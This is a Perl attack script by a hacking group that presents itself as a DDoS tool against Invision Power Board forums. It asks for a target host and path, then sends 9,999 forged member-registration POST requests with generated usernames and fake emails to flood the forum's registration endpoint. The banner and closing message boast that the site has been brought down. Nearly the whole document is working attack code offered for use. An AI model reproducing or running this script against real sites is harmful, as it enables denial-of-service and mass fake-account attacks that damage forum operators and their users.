#!/usr/bin/perl use IO::Socket; ########################################################## ## ###### ###### # ###### # ## # # ### ### # # # ## ###### ###### # # ###### # ## # ##IPB Register Multiple Users Denial of Service # ##Doesn't Work on forums using "Code Confirmation" # ##Created By OXYD # ##AntiSec Team # ##www.oxydhacked.3x.ro # ##zdanutzufinutzu@gmail.com # ##DeadSquad # ########################################################## print q{ ############################################################ # Script special de DDoS pentru site-uri # # Testat de DeadSquad # # created By OXYD . DeadSquad Team # ############################################################ }; $rand=rand(10); print "Host-ul: "; $serv = ; chop ($serv); print "Patch-ul: "; $path = ; chop ($path); for ($i=0; $i<9999; $i++) { $name="script".$rand.$i; $data = "act=Reg&CODE=02&coppa_user=0&UserName=".$name."&PassWord=sedbotbeta&PassWord_Check=sedbotbeta&EmailAddress=".$name."\@host.com&EmailAddress_two=".$name."\@host.com&allow_admin_mail=1&allow_member_mail=1&day=11&month=11&year=1985&agree=1"; $len = length $data; $get1 = IO::Socket::INET->new( Proto => "tcp", PeerAddr => "$serv", PeerPort => "80") || die "Cennot Connect Host, it's can be beacuse the host dosed"; print $get1 "POST ".$path."index.php HTTP/1.0\n"; print $get1 "Host: ".$serv."\n"; print $get1 "Content-Type: application/x-www-form-urlencoded\n"; print $get1 "Content-Length: ".$len."\n\n"; print $get1 $data; syswrite STDOUT, "+"; } print "Dude , tocmai mi-am facut datoria si l-am picat. Esti fericit?\n"; # phantom01.16mb.com [2017-01-20]